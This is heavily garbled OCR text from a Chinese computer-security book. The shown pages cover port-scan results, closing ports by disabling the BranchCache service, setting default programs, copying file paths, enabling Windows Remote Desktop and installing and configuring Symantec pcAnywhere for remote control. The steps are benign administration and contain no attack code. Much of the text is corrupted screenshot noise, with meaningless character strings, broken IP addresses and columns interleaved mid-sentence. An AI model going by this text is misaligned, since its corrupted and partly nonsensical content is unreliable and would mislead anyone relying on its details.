step 图 扫描 完毕 后 ， 将 会 自动 弹出 “探测 结 
果 ” 对 话 框 ， 如 果 目 标 主 机 存在 开放 端口 ， 
就 会 在 该 对 话 框 中 显示 出 来 ， 如 下 图 所 示 。 


探 弄 结 果 


I EE £9 Ra 


开放 端口 


主机 192.168.0.105 庙 口 0080.… 开 启 (PROXY)， 
主机 192.168.0,105 庙 口 0080,… 开 启 (HTTP) 


[| 


二 


[Sep 图 打开 “端口 探测 设置 ”对 话 框 ， 在 该 
对 话 框 中 选中 “ 自 定义 端口 探测 范围 ” 复 
选 框 ， 然 后 在 “范围 ”选项 区 中 设置 要 探 


EL 
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实战 演练 2 一 一 关闭 系统 中 无 用 的 端口 

默认 情况 下 ， 计 算 机 系统 中 有 很 多 没 旨 
有 用 或 不 安全 的 端口 是 开启 的 ， 这 些 端 
很 容易 被 黑客 利用 。 为 保障 系统 的 安全 ， 
可 以 将 这 些 不 用 的 端口 关闭 。 关 闭 端口 的 
方式 有 多 种 ， 这 里 介绍 通过 关闭 无 用 服务 
来 关闭 不 用 的 端口 。 


以 关闭 Branch Cache 服务 为 例 ， 具 体 
的 操作 步骤 如 下 。 
Estee 图 右 击 “ 开 始 ” 按 钮 ,在 弹出 的 快捷 菜单 
中 选择 “控制 面板 ”菜单 命令 ， 如 下 图 所 示 。 


任 罕 管理 震 (D) 


控制 面板 (P) 


NR 


文件 资源 管理 器 (E) 
搜索 (S) 
运行 (R) 


关机 或 注销 (U) 


step 图 打开 “控制 面板 ”窗口 ， 双 击 “ 管 理 
工具 ”图 标 ， 如 下 图 所 示 。 


ED 
"me 
pl WR) RM) IAM Ra 


多 束 } 算 机 的 届 加 gr As9 


琼 buodker hahahns 


Fash Player 


图 noozisasemm 国 六 


mienean 


of Outlook [WB RemoteApp fume 


困 waow pefondor 3 w 上 window my 
et 次 amagwndowsn 。 闻 ri 

区 ps 问 Ee miEinmP 入 Fa 

Wy 人 Et 国 Tryx# 关 入 | SIa 
an Pe oe 
3 天 Was 国 Fa=ss 


[step 图 打开 “管理 工具 ”窗口 ， 双 击 “ 服 务 ” 
图 标 ， 如 下 图 所 示 。 


Em 国 


Estee 加 打开 “服务 ”窗口 ， 找 到 Branch 
Cache 服务 项 ， 如 下 图 所 示 。 


[se 图 双击 该 服务 项 ， 弹 出 “BranchCache 
的 属性 ”对 话 框 ， 在 “启动 类 型 ”下 拉 列 
表 框 中 选择 “禁用 ”选项 ， 然 后 单 击 “ 确 定 ” 
按钮 ， 禁 用 该 服务 项 的 端口 ， 如 下 图 所 示 。 


导 训 。 人。 RF 


Sm PeerDistswe 
Sx BranchCache 
es 上 说 认识 ， 


二 风 外 雪子 但 可 捞 定 折 通用 的 应 中 参政 


BPM: 


Ce ww 


5.5 ”小 试 身手 
练习 1: 设置 默认 应 用 程序 


现在 ， 计 算 机 的 功能 越 来 越 强大 ， 应 高 腕 


用 软件 的 种 类 也 越 来 越 多 ， 往 往 为 一 个 功 
能 用 户 会 在 计算 机 上 安装 多 个 软件 ， 这 时 
该 怎么 设置 其 中 一 个 为 默认 的 应 用 呢 ? 最 
常用 的 方法 是 在 “控制 面板 ”窗口 中 进行 
设置 ， 具 体 的 操作 步骤 如 下 。 

[Bp 图 大 去 “开始 ”按钮 ， 在 弹出 的 快捷 菜 
单 中 选择 “控制 面板 ”菜单 命令 ， 打 开 “ 控 
制 面 板 ” 窗 口 ， 如 下 图 所 示 。 
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目标 系统 的 扫描 与 网 络 数据 的 嗅 探 se 


SS 黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


ET ss 


- 个 司 = RERE- ) 了 ， 忆 三 ES 本 
四 @| 
We 选 至 Windows 默认 使 用 的 程序 
加 asssies 
RF 
固 = 
EE 
本 r= 
Bm CD ER 
rp 
”和 有 证 尼 的 让 凋 , 工本 计算 和 的 天 各， 


rio 


[Eee 图 单 去 “设置 默认 程序 ” 超 链接 ， 即 可 


开始 加 载 系统 中 的 应 用 程序 ， 如 下 图 所 示 。 
[ee 国 单 二 查看 方式 右 侧 的 “类别” 按钮， a iets 


在 弹出 的 快捷 列表 中 选择 “大 图 标 ” 选 项 ， 4 [ 攻 和 | 
如 下 图 所 示 。 放权 


要 要 个 经 和 本 主 林 凡 打 开交 匠人 半 型 和风 的 天生 友和 间 二 信介 序 再- 设 力 叶 
记 面 ， 


回 palm = x 
< 人 国 ,wei 了 | Sei 5 
宰 先 计生 的 i 轩 ER el 
DE 

BE 


Ea. 
Bin Internet 
er 
a 

3 


- 2 [ep 罗 ] 加 载 完 毕 后 ， 在 “设置 默认 程序 ” 窗 
口 的 左 侧 显示 出 程序 列表 。 选 中 需要 设置 
为 默认 程序 的 应 用 ， 单 击 “ 将 此 程序 设置 
为 默认 值 ” 链 接 ， 即 可 完成 设置 默认 应 用 
的 操作 ， 如 下 图 所 示 。 


step 国 这 样 ， 控 制 面 板 中 的 选项 以 大 图 标的 


me oO x 
方式 显示 ， 如 下 图 所 示 。 上 个 两 NE ， 吉本， 习 和 可 | Sia 5 
上 
设 百 球 奏 序 

CDs 专人 人 
i -- 

计算 机 Bi 下 

并 bttocker aaahshne Flash Player © intemet sm 

EB Mail (Microsoft Outlook Realleks EE 

[re 园 wowwwre 四 

前 Remoterpp natn 册 windows Defender 。。 蔚 Wndows Fx 

PW ese 六 smamwindow7n 六 BFirmie i 

地 5 Ee 年 5 

> 柱 此 可 奈 设 省 为 对 全 (S] 
是 Tt 用 re i 人 
| > 二 HEFppRRA 信 (C 
的 组 ~ 针 Td 
天 号 er 团 Sesas @ satesss+e 十 
a i 
Das 已 ssEemeg 本 gmmea 


后 国 单 点 “ 棱 认 程序 ” 图标 ， 打 开 “ 蚂 认 | 练习 2: 快速 找到 文件 的 路 径 
程序 ”窗口 ， 如 下 图 所 示 。 有 时 需要 快速 确定 某 个 文件 的 位 置 ， 世 
如 编程 时 需要 引用 某 个 文件 的 位 置 ， 这 时 
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可 以 快速 复制 文件 /文件 夹 的 路 径 到 剪 切 
板 ， 具 体 的 操作 步骤 如 下 。 

[step 国 打开 “文件 资源 管理 器 ”， 在 其 中 
找到 要 复制 路 径 的 文件 或 文件 夹 ， 在 其 上 
按 住 Shift 键 ， 右 击 ， 会 比 直 接 右 击 弹 出 
的 快捷 菜单 中 多 出 一 个 “复制 为 路 径 ” 选 
项 ， 如 下 图 所 示 。 


CT 到 = 
坷 二 是， 个 中 
4 ， "小 融 ， 2， 症 | HO 到 
Sm EE 
a | 中] 开 四 
betes . et 
itr WD 
Ba rca] Windcna Media ployer FA) 
[ea Windows Media player BA 
Bs bd 
te AN ea CW 
rm- 
hs 国 Saved Micorecs Fr 四 
于 wm 国 ReEeee 
国 xm 全 widow Deonder 扣 ， 
pr #5 > 
ws EE 
die 外 和 本本 中 
= S em 
EE 
So Windowsl0 cy ee 
2 个 项 日 寺中 1 个 顺 日 同 
ser sD 
I 
Ss 
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[step 图 选择 “复制 为 路 径 ” 选 项 ， 则 可 以 将 
其 路 径 复 制 到 剪贴 板 中 ， 新 建 一 个 记事 本 
文件 ， 按 CtrlHV 组 合 键 ， 就 可 以 复制 路 径 
到 记事 本 中 ， 如 下 图 所 示 。 


国 无 标 旦 - 记事 本 去 口 x 
文件 昌 。 尝 重 (E) 个 式 (O) 可 看 V) 帮助 (H) 
“C:\Users\Administrator\Pictures\Saved Pictures’| 


了 


第 6 音 Windows 系 统 远 


远程 控制 与 


网 络 其 矣 


随 着 计算 机 的 发 展 ， 越 来 越 多 的 操作 系统 为 满足 用 户 的 需求 ， 在 操作 系统 中 加 入 了 远 
程控 制 功能 ， 这 一 功能 本 是 方便 用 户 的 ， 但 是 却 被 黑客 们 利用 。 本 章 介 绍 远程 控制 攻击 以 


及 网 络 欺骗 的 攻击 方法 ， 主 要 内 容 包 括 使 用 远程 控制 攻击 的 方法 、 
防范 网 络 欺骗 的 技巧 等 。 


网 络 其 骗 攻 击 方法 、 


6.1 通过 Windows 远 程 时 面 实 
现 远 程控 制 


远程 控制 是 在 网 络 上 由 一 台 计 算 机 ( 主 
控 端 /客户 端 ) 远 距离 去 控制 另 一 台 计 算 机 
〈 被 控 端 /服务 器 端 ) 的 技术 ， 而 远程 一 般 
是 指 通过 网 络 控制 远 端 计算 机 ， 和 操作 自 
己 的 计算 机 一 样 ， 使 用 Windows 远程 桌面 
可 以 实现 远程 控制 。 


浊 绝招 1: 开启 Windows 远 程 桌面 功能 


远程 桌面 功能 是 Windows 系统 自 带 的 
一 种 远程 管理 工具 ， 具 有 操作 方便 、 直 观 
等 特征 。 在 Windows 系统 中 开启 远程 桌面 
的 具体 操作 步骤 如 下 。 
BE 国 右 二 “此 电脑 ”图 标 ， 在 弹出 的 快捷 
菜单 中 选择 “属性 ”菜单 命令 ,打开 “系统 ” 
对 话 框 ， 如 下 图 所 示 。 


ET 


"i ， 卫 站 
日 < 
查看 有 关 计算 机 的 基本 信息 

Windows 


me 十 windows10 


© Se 


ei 


防范 远程 控制 的 技巧 、 


[step 图 选择 “运程 设置 ”选项 ， 打 开 “ 系 统 
属性 ”对 话 框 ， 选 中 “允许 远程 连接 到 此 
计算 机 ” 复 选 框 ,设置 完毕 后 ， 单 击 “ 确 定 ” 
按钮 ， 即 可 完成 设置 ， 如 下 图 所 示 。 


HE 机 4 。 高 取 。 系 流 保护 过 得 


HD 
巴 这 运 委 夫 间 法 这 各 苦 轴 (R) 
EE 


高 级 M). 
远 如 本 
渤 了 一 个 泛 项 ， 航 后 江 定妆 可 以 壬 接 、 
口 不 jt 放 近 生 过 要 Wit 卸 轴 D) 
图 世 池 这 竹本 拉 此 计 小 HU 
Ep 


卫队 到 沁 本 月 (5 


Ce mm 


绝招 2: 使 用 远程 桌面 功能 实现 远程 控制 器 六 


如 果 目 标 主 机 开启 了 远程 桌面 连接 功利 这 
能 ， 就 可 以 在 网 络 中 的 其 他 主机 上 连接 控 
制 这 台 目 标 主机 了 ， 通 过 Windows 远程 桌 
面 实现 远程 控制 的 操作 步骤 如 下 。 


[Ee 选择 “开始 "Windows 附件 ”_，“ 远 
程 桌 面 连接 ” 选项， 打开“ 远程 桌面 连接 ” 
窗口 ， 如 下 图 所 示 。 


观 远 尼 吉 盏 注 接 


Se 


计算 机 (ck | 睹 侣 computer.fabikam.com 


用 Pg: 。 霜 E 定 


计算 机 全 闻 掺 为 主 ， 主 过 入 完 虹 的 远 企 计算机 全 


9 SO) 


0(H) 


[seep 图 单 去 “显示 选项 ”按钮 ， 展 开 即 可 看 
到 选项 的 具体 内 容 。 在 “常规 ”选项 卡 的 “ 计 
算 机 ”下 拉 列 表 中 选择 需要 远程 连接 的 计 
算 机 名 称 或 二 地 址 ， 在 “用 户 名 ”文本 框 
中 输入 相应 的 用 户 名 ， 如 下 图 所 示 。 


nner 


VCE [1921081103 


Ra 


ls 


[a 


连带 2 下 
| 


fs) Bea). TO- 


~ EO) 


ET 


[step 图 选择 “显示 ”选项 卡 ， 在 其 中 可 以 设 
置 远程 桌面 的 大 小 、 颜 色 等 属性 ， 如 下 图 
所 示 。 

| Sms 


| [el 尘 坟 


局 观 。 人 f 栓 。 关 役 
mE 


围 aaaecanx saesaaacoxenapa。 


马 


加 全 EF) 


Ey 


EE 
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[step 国 如 果 需 要 远程 桌面 与 本 地 计算 机 文件 
进行 传输 ， 则 在 “本 地 资源 ”选项 卡 下 设 


置 相 应 的 属性 ， 如 下 图 所 示 。 


Er 


2 连接 


网 Windews 王 e 硬 作 
EGR 

地 中 AtrTeb 

5 要 下 
RepRRIOREHIS 

[Sb] ey 


eR. 


向 用 吉 寺 有 0) EN) 


WN) 


单 击 “ 详 细 人 信息” 按钮 ， 在 “本 地 设 

备 和 资源 ”中 选择 需要 的 驱动 器 ， 单 击 “ 确 

定 ” 按 钮 ， 如 下 图 所 示 ， 返 回 到 “远程 桌 

面 连接 ”设置 的 窗口 。 
网 去 丰 点 于 注 捷 


有 名 


思 币 5 括 和 的 站 器 
口 关 他 SOIS(pnp) 必 生 


step 图 单 去 “连接 ”按钮 ,进行 远程 桌面 连接 ， 
如 下 图 所 示 。 


取消 


豫 远 EE 训 而 和 按 


芷 机 、 请 闽 你 在 连接 之 前 信任 比 沅 得 计算 机 。 


网 革 


运 入 计算 外 


EE 
192.1681.103 


口 个 5 全 二 UO) 


局 SF) RN) 区 可 


如 


黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


EGs 国 单 直 “ 连 接 ”按钮 ， 弹 出 “远程 桌面 
连接 ”对 话 框 ， 显 示 正 在 启动 远程 连接 ， 
如 下 图 所 示 。 


豫 远 柑 点 西 注 接 汪 
| 正在 连接 到 : 
人 192.168.1.103 
EEE [| 
正在 启动 远程 注 接 … 


Step 图 启动 远程 连接 完成 后 ， 将 弹出 
“Windows 安全 性 ”对 话 框 ， 分 别 输入 登 
录用 户 的 名 称 和 登录 密码 ， 如 下 图 所 示 。 


som a 
输入 你 的 凭据 
这 些 光 据 格 用 于 连接 192.168.1.103。 


@ Administrator 


DESKTOP IMAAADA Administrarr 


口 ene 
更 多 选 顺 


确 宇 bd] 


[tep 国 单 击 “ 确 定 ” 按 钮 ， 会 弹出 一 个 信息 
提示 框 ， 提 示 用 户 是 否 继续 连接 ， 如 下 图 
所 示 。 


和 迄 覃 间 本 渤 二 


| 旺角 时 ltzrhHUESahd9pGE 


3 ROE 
EN-20S0B 


证 书 梢 刘 
驻 证 远程 计算 机 的 证 和 了 再 到 下 3 


羔 证 书 来 向 不 信任 NiE 书 时 证 机 榴 ， 
人 相连 接 酉 各 上面 而 加 险 这 些 证 书 赠 由? 
两 剖 和 是 醒 汪 六 计算 愉 加) 


| 查看 下 蔬 ) 是 


step 了 加 单 击 “是 ”按钮 ， 即 可 登录 到 远程 计 
算 机 桌面 ， 此 时 可 以 在 该 远程 桌面 上 进行 
任何 操作 ， 如 下 图 所 示 。 


1 Sa 


另外 ， 在 需要 断 开 远 程 桌面 连接 时 
只 需 在 本 地 计算 机 中 单 击 远程 桌面 连接 窗 
口上 的 “关闭 ”按钮 ， 弹 出 断 开 与 远程 桌 
面 服务 会 话 的 连接 提示 框 ， 如 下 图 所 示 。 
单 击 “确定 ”按钮 ， 即 可 断 开 远程 桌面 连接 。 


运 本 点 而 连接 


这 酝 新 开 与 远程 襄 面 受 务 会 活 的 连接 ， 在 疡 开 连 接 后 ， 程 序 枯 效 疆 运 
行 。 可 以 通过 再 次 登录 和 后 重新 这 接 到 此 会 话 - 


Ce GEw 


侈 提示 : 在 进行 远程 桌面 连接 之 前 ， 需 要 
双方 都 选中 “允许 远程 用 户 连接 到 此 计算 
机 ” 复 选 框 ， 否 则 将 无 法 成 功 创建 连接 。 


6.2 ”使 用 Symantec pcAnywhere 
实现 远程 控制 

Symantec pcAnywhere 是 一 款 元 老 级 的 

远程 控制 工具 ， 具 有 远程 控制 、 全 方位 的 


远程 管理 、 高 级 的 文件 传输 等 功能 ， 可 以 
提高 技术 支持 效率 并 减少 呼叫 次 数 。 


绝招 3: 安装 Symantec pcAnywhere 工 具 


Symantec pcAnywhere 的 安装 与 其 他 软 Bt 
件 相 似 ， 但 需要 同时 在 主 控 端 和 被 控 端 计 
算 机 中 ， 分 别 安装 Symantec pcAnywhere 远 
程控 制 软件 。 具 体 的 操作 步骤 如 下 。 
[sep 回 双击 Symantec pcAnywhere 安装 程序 ， 
即 可 打开 “欢迎 使 用 Symantec pcAnywhere 
安装 程序 ”窗口 ， 如 下 图 所 示 。 


朝 Symantec pcAnywhere 


ymantec。 痢 mantee pemyrmhere 2 


-Installshield Wiard 一 着 


te pcinywhere 到 让 的 计 


9 Fw> 到 肖 
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[step 较 单 击 “下 一 步 ” 按 钮 ， 即 可 打开 “ 许 
可 协议 ”窗口 ， 选 中 “我 接受 许可 协议 中 
的 条 款 ” 单 选 按钮 ， 如 下 图 所 示 。 


乱 Symantec pcAnywhere - Instalshield Wizard — x 


EE ” 池 


请 仔细 阅读 下 面 的 许可 协议 。 


If you are located in the Americas, the first license agreement below govems 
lyour use of this product Ifyou are located outside of the Americas. the 
second license agreement governs your use of this product 


SYMANTEC SOFTWARE LICENSE AGREEMENT (US) 
Symantec pcAnywhere 


IMPORTANT: PLEASE READ THE TERMS AND CONDITIONS OF THIS 


图 我 接受 许可 协议 中 的 条 蒜 A) 打印 中.… 
口 我 下 接受 许可 协议 中 的 条 款 O) 


Instalshield 


EB [FB03>] | WN 


[step 图 单 南 “ 下 一 步 ”按钮 ， 即 可 打开 “ 客 
户 信 息 ” 窗 口 ， 在 其 中 输入 自己 的 用 户 名 
和 组 织 ， 如 下 图 所 示 。 


期 Symantec pcAnywhere - InstallShield Wizard 一 x 


客户 信息 
请 输入 您 8 信息 。 
用 户 名 WU: 
网 软 用 户 
组 织 @): 
网 软 国 


Instalshield 


ES [FS00>] | BW 


[ep 加 单 去 “下 一 步 ”按钮 ， 即 可 打开 “ 目 
的 文件 夹 ”窗口 ， 在 其 中 可 以 看 到 默认 的 
安装 路 径 。 如 果 要 重新 选择 安装 路 径 ， 只 
需 单 击 “ 更 改 ” 按钮 ， 即 可 完成 路 径 的 选择 ， 
如 下 图 所 示 。 


产 Symantec pcAnywhere - InstallShield Wizard 一 X 


留 Me Symantec pcAnywhere 的 文件 。 想 要 去 装 在 


目的 文件 夹 
C\Program Files (x86)\Symantec\pcAnywhere\ 


更 欢 (0). 
磁盘 大 小 可 用 所 震 相差 
968 5268 147MB 6208 
100 GB 3 0 3% 
23368 656 加 DG 155@ > 


< 上 20) [FB00>] | MW 
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[sep 图 单 去 “下 一 步 ” 按 钮 ， 即 可 打开 
“ 自 定 义 安 装 ” 窗 口 ， 在 其 中 选择 安装 
Symantec pcAnywhere 附带 的 工具 ， 如 下 图 
所 示 。 

莉 Symantec pcAnywhere - InstallShield Wizard = x 


自 定义 安装 
单 击 下 面 列表 中 的 图 慰 更 改 功能 的 安装 方式 


了 | 主机 管理 员 
X | 主机 管理 员 代理 


Ln 
主要 的 pcAnywhere 文件 梅 被 安装 。 


功能 大 小 需求 
| Bs 已 选择 了 1 个 子 功能 中 的 1 个 。 子 功能 需要 130 NB 硬盘 空 


如 助 0 < 上 — 步 ®) 取消 


[sep 国 单 击 “下 一 步 ” 按 钮 ， 即 可 打开 
“已 准备 好 安装 程序 ”窗口 ， 选 中 “创建 
Symantec pcAnywhere 桌面 快捷 方式 ” 复 选 
框 ， 如 下 图 所 示 。 


期 Symantec pcAnywhere - InstallShield Wizard 一 x 
已 准备 好 支 装 程序 
访 疝 导 已 准备 好 开始 去 装 。 


单 击 安 装 开 始 安装 。 
a 单 击 -上 一 步 。 单 击 "取消 退 


快捷 方式 
回调 Symantec pchnywhere 桌面 快捷 方式 (c) 


< 上 -加 取消 


单 击 “ 安 装 ” 按 钮 ， 即 可 进行 安装 并 
显示 安装 进度 ， 如 下 图 所 示 。 


莉 Symantec pcAnywhere - Instalshield Wizard 一 x 


正在 安装 Symantec pcAnywhere 
您 选择 的 程序 功能 正在 补 安 装 。 


talShveld ywhere, . 
但 | ee Symantec pcAn 请 稍 假 * 此 操作 可 能 


状态 : 
正在 准备 安装 剩余 时 间 : 少 于 1 分 钟 * 


< 上 上 一步 癌 下 一 步 0 > 
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SS 黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


[step 较 在 安装 结束 之 后 ， 即 可 看 到 “TnstallShield ”在 其 中 选择 相应 连接 方法 ， 如 下 图 所 示 。 
向 导 已 完成 ”窗口 ， 如 下 图 所 示 。 a x 
期 Symantec pcAnywhere - Instalshield Wizard = SS Symantec. 方法 二 了 主机 和 过 和 和 总之 的 于 方式 主轴 和 汪 生 
mstalshield 向 导 已 完成 人 
Symantec- 
9 Instalshiald 向 号 已 成 功 安 装 了 Symantecpcanynhere。 单 
Ee ena 
四 他 和 学 全 用 下 绕 击 全 检 沽 张 /DSLLAN/ 近 号 互 际 网 |SP(O, 


舍 达 了 WE 基 于 不 司 = 让 8 现 多 全 时 再 二 ' 居 : 
至 二 下 - 步 . 


口 查看 说 明文 件 
口 放行 pcAnywhere 主机 | 


saa ] 后 二 [EGG 图 单 二 “下 一 步 ”按钮 ， 即 可 打开 “ 连 
Ee 图 单 击 “完成 按钮, 即 可 结束 安装 操作 。 接 向 导 - 目标 地 址 ”对 话 框 ， 输 入 远程 计算 
双击 桌面 上 的 快捷 图 标 , 即 可 打开 “Symantec ， 机 下 地 址 ， 如 下 图 所 示 。 
pcAnywhere” 初 始 窗口 ， 如 下 图 所 示 。 EE 


SY ymantec. a 
和 字 ， 生 一 的 T 且 要 ] 到 25， 生 和 之 有 
BD 203204 2.71. 


计算 的 ip 地 址 什么 (D7 


| 


次 于 7 
信息 ， 适 单 二 大 


要 史诗 时 去 下 一步 


二 亲人 | mm | ww | 


Be 国 单 去 “下 一 步 ”按钮 ， 即 可 打开 “ 连 
接 向 导 -连接 名 称 ”对 话 框 ， 在 其 中 输入 连 
接 的 名 称 ， 如 下 图 所 示 。 


srs- SS x 


在 主 控 端 和 被 控 端 计算 机 中 分 别 安 装 。 入 ww" Se 
好 Symantec pcAnywhere 之 后 ， 需 要 对 其 进 
行 设置 ， 从 而 实现 远程 控制 的 功能 。 


1. 使 用 连接 向 导 配置 主 控 端 


在 控制 远程 计算 机 之 前 ， 需 要 在 本 地 
计算 机 上 使 用 连接 向 导 的 方式 创建 一 个 远 ns 
程 连接 ， 具 体 的 操作 步骤 如 下 。 
[sep 回 在 Symantec pcAnywhere 初始 窗口 “ 操 
作 ” 栏 目 中 ， 单 击 “ 编 辑 远程 设置 ”按钮 ， [so 国 单 二 “下 一 步 ”按钮 ， 即 可 打开 “ 连 
即 可 打开 “连接 向 导 - 连接 方式 ”对 话 框 ， 接 向 导 - 摘要 ”对 话 框 ， 在 其 中 查看 自己 的 


二 FT 
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设置 是 否 正确 。 若 无 误 ， 则 可 单 击 “ 完 成 ” 
按钮 关闭 连 接 向 导 ， 如 下 图 所 示 。 


一 一 x 
Domantee -em 
香 复 过 以 下 信息。 冯 果 容 秀 要 更 改 ， 单 击 ' 上 一 步 。 单 主 完成 ' 以 保有 雍 
远 酝 笑 衬 项目。 
连 按 关 型 : 电 比 滑 制 解 油 总/DSL/LAN/ 按 号 互联 网 15P 


p 节 直 ep 
连 妆 同 守 元 世 二 连 打 到 王 机 寺 算 IC). 


Symantec pcAnywhere 开会 二 DE 三 EF 同 3 中 
BS ET 


< 上 9) | 8 


step 了 图 若 同时 选中 “和 连接 向 完成 后 连接 到 主 
机 计算 机 ” 复 选 框 ， 单 击 “ 完 成 ”按钮 ， 


mw | wm 


弹出 “pcAnywhere 正在 等 待 …… ”对 话 框 ， 
提示 用 户 正 在 与 主机 计算 机 建立 连接 。 
Pechnywhere ES = x 
正在 连接 到 192. 168.0.135 光 
正在 和 和 过 
step 图 在 Symantec pcAnywhere 初始 窗口 中 ， 


单 击 “ 切 换 到 高 级 视图 ”按钮 ， 即 可 将 其 
切换 到 高 级 视图 模式 ， 在 “远程 ”选项 卡 
下 可 看 到 新 创建 的 连接 ， 如 下 图 所 示 。 
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[step 国 ] 右 去 新 建 的 远程 连接 ， 在 弹出 的 快捷 
菜单 中 选择 “属性 ”菜单 命令 ， 即 可 打开 “ 远 
程 属性 : 我 的 连接 ”对 话 框 ， 在 其 中 可 重 
新 设置 相关 的 选项 ， 如 下 图 所 示 。 


ET x 


us | | | ms | | fma| 


将。 大 目的 到 和。 
证 本 


委 S 定 义 设 基部 去 

设备 列表 NN}: 

Dom PD 

Com 

Cem 

Cems 富 到 机 区 

om 6 oR) 
EN) 
C wa 


厂 通 可 网 关 砚 Accese Server 连 玉 |G) 


2. 使 用 连接 向 导 配置 被 控 端 


在 设置 完 主 控 端 之 后 ， 要 想 实现 联机 ， 
还 需要 使 用 连接 向 导 对 被 控 端 进行 配置 。 
具体 的 操作 步骤 如 下 。 
[step 回 在 Symantec pcAnywhere 初始 窗口 “ 操 
作 ” 栏 目 中 ， 单 击 “ 编 辑 主机 设置 ”按钮 ， 
即 可 打开 “连接 向 导 - 连接 方式 ”对 话 框 ， 
在 其 中 选择 相应 的 连接 方式 ， 如 下 图 所 示 。 


ET x 


S symantec. 


ee 


上 时 公用 相 9 这 和 广 


为 泣 全 用 部 和 过 过 方法 ? 


人 雪人 且 忆 类 涯 和 角 尖 久 /DSWLAN/ 接 互 缮 网 SP 


A 


壮阳 多 信和 归 ， 关 间 二 因 妈 。 


和 要. 清音 二 下 一 少 。 


FE ww | 由 | 


step 图 在 选择 好 连接 方式 之 后 ， 单 击 “ 下 一 
步 ” 按钮 ， 即 可 打开 “连接 向 导 -连接 模式 ” 
对 话 框 ， 在 其 中 选择 相应 的 模式 ， 如 下 图 
所 示 。 
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ymantec. 


= 


[sep 图 单 去“ 下 一 步 ” 按 钮 ， 即 可 打开 “ 连 
接 向 导 - 验证 类 型 ”对 话 框 。 用 户 需要 在 其 
中 选择 合适 的 验证 类 型 ， 如 这 里 选中 “我 
想 使 用 一 个 现 有 的 Windows 账户 ” 单 选 按 
钮 ， 如 下 图 所 示 。 


风门 导 - 失 iT 弄 x 


BY ymatec. 


Same pre Et sng 
汪 革 证 可 以 各 于 一 个 现 有 的 由 户 ， 基 守信 可 以 全 奸 一 个 用 让 人 和 克 
吉 


a 


全 各 一 人 向 的 Windows 由 = 
Fo — 人 SN). 


要 直入 ,请 从 二 下 一 沙 。 


ey 邮 


step 图 单 击 “下 一 步 ” 按 钮 ， 即 可 打开 “ 连 
接 向 导 -选择 账户 ”对 话 框 ， 在 其 中 选择 
远程 登录 用 户 所 使 用 的 本 地 账户 ， 如 下 图 
所 示 。 


过 向 对- 这 村 由 户 x 


ymatec. 


| 


Symartec pcAnywhere 已 失当 将 在 所 本 地 其 从 上 可 局 下- 


.全 El 吉 使用 吾 个 二 培 栖 挛 IA 


com [F000] ww | sm | 


step 国 单 去 “下 一 步 ” 按 钮 ， 即 可 打开 “ 连 
接 向 导 -连接 名 称 ” 对 话 框 ， 在 其 中 输入 相 
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应 的 名 称 ， 如 下 图 所 示 。 


EE 和 


ymantec. 


尖 Nbeees 人 ee 
BEET 


要 清早 二 下- 步 。 


‘tsm [tsm:| we | wm | 


[ep 国 单 二 “下 一 步 ” 按 钮 ， 即 可 打开 “ 连 
接 向 导 - 摘要 ”对 话 框 ， 选 中 “连接 向 导 完 
成 后 等 待 来 自 远程 计算 机 的 连接 ” 复 选 框 ， 

单 击 “ 完 成 ”按钮 ， 即 可 关闭 连接 向 导 ， 

如 下 图 所 示 。 


六 二 网- 要 要 x 


ymatec. 


RET 过 澳 S. 
请 二 J 下 信 息 。 各 果 个 村 要 村 站 ， 音 十 ,上 一步 。 剖 主 完成 以 保 六 此 


EE 

SE TE 

Ee 站 汕 凡 尖 纤 /D3LLAN/ 当 下 网 |SP 
WE Windows WP 


尘 抽 向导 震动 所 半 宇和 程 二 咏 失 和 梁 (W)。 


Syrantee pchrynhere HAE ER EAE EF 
这 此 这 本 不 可 用 en 清音 二 部 助 | 
sm | ww | 由 | 


返回 到 系统 桌面 上 ， 可 以 在 Windows 
的 通知 区 域 中 看 到 一 个 国 图 标 ， 将 光标 放 在 
该 图 标 上 ， 表 示 Symantec pcAnywhere 在 等 
待 主 控 端 的 连接 ， 如 下 图 所 示 。 


并 上 国民 - L 


Symantec pcAnywhere 正在 等 待 .， 


step 图 在 “Symantec pcAnywhere 高 级 视图 
模式 ”窗口 的 “主机 ”窗口 可 以 看 到 新 添 
加 的 被 控 端 ， 如 下 图 所 示 。 


第 6 章 ，Windows 系 统 远程 控制 与 网 络 欺骗 Eee 


SS symantec. 
日 | 由 和 [sis 
PE TIE TE 了 


peed RE TD Nm 
2 || 全 下 全 一- 


本 台 


[step 图 右 去 添加 的 被 控 端 主机 ， 在 弹出 的 快 
ry ee “属性 ”菜单 命令 ， 即 可 打 
开 “ 主 机 属性 : 我 的 主机 ” 对 话 杠 ， 在 其 
中 重新 设置 各 个 属性 ， 如 下 图 所 示 。 


ETE 


浪人 如 | 设置。 | a 客 | 安 全 远大 | 加 训 。| 会议 | 广 陈 | aR | 


ee 


条 在 人 的 方 杠 ，L.E 反 最 去 隔 个 设 各 末 于 尼 半 本。 
定义 一 个 疫 备 ， 单 二 设备 名 称 角 后 间 古 诗 和 所， 


一 和 计算/O 


几 


主 a I 


菩 曲 绝招 5: 开始 进行 远程 控制 


在 对 主 控 端 和 被 控 端 分 别 进行 设置 后 ， 
即 可 与 目标 主机 进行 连接 ， 以 实现 控制 该 
主机 的 目的 。 与 远程 主机 建立 连接 的 具体 
操作 步骤 如 下 。 
[step 图 在 “Symantec pcAnywhere 管理 器 ” 
中 选择 “快速 连接 ”选项 ， 即 可 打 
“快速 连接 ”窗口 ， 在 其 中 输入 被 控 端 
耳 地 址 、 计 算 机 名 称 等 信息 ; 在 “启动 
模式 ”下 拉 列 表 中 ， 可 以 选择 相应 的 选项 ， 
如 下 图 所 示 。 


单 击 “ 连 接 ” 按 钮 ， 即 可 与 目标 计算 
机 连接 。 在 “Symantec pcAnywhere 管理 器 ” 
任务 栏 中 选择 “快速 部 署 与 联机 ”选项 ， 
即 可 在 “快速 部 署 和 连接 ”列表 中 看 到 已 
经 连接 的 计算 机 名 称 ， 如 下 图 所 示 。 


四 双击 需要 连接 的 被 控 端 计算 机 名 称 ， 


可 打开 “连接 到 : B97GQWDC8IOUUQ8” 
对 话 框 ， 在 其 中 输入 登录 用 户 名 和 密码 ， 
如 下 图 所 示 。 

| 


step 回 单 去 “确定 ”按钮 ， 即 可 与 被 控 端 建 
衬 连 接 ， 如 下 图 所 示 。 


Bs (Tene (nu 
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[step 图 在 与 被 控 端 计算 机 连接 并 成 功 登 录 之 
